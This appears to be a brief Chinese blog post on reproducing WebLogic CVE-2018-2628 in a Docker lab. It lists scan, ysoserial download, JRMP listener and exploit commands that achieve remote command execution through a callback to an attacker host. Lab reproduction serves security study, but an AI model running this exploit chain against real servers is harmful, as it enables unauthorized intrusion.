CVE-2018-2628

2018-06-02  本文已影响0人  zhenx1n

环境搭建

 weblogic靶机:
      docker pull zhiqzhao/ubuntu_weblogic1036_domain
      docker images
      docker run -d -p7001:7001 zhiqzhao/ubuntu_weblogic1036_domain 

 攻击的服务器:
       java + python2环境即可

  docker学习笔记: https://www.evernote.com/shard/s461/sh/bc38ea4c-3bfe-4321-ab3c-1742f69998e4/4e371b210ab3b23e9df415f54dadaabb

漏洞利用

在windows上执行exploit,返回数据二进制会在cmd中报错,但是命令是可以执行成功的,Linux下是没有报错的。
攻击机执行命令:
nmap -sV --script=weblogic-t3-info -Pn 120.77.253.216 -p7001
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1  'touch /tmp/zhenxin'
python cve-2018-2628.py 120.77.253.216 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 122.152.233.180 1099 JRMPClient2
image.png
image.png
image.png

漏洞原理

明天补。

参考文章

https://blog.csdn.net/archersaber39/article/details/80135463#t0

上一篇下一篇

猜你喜欢

热点阅读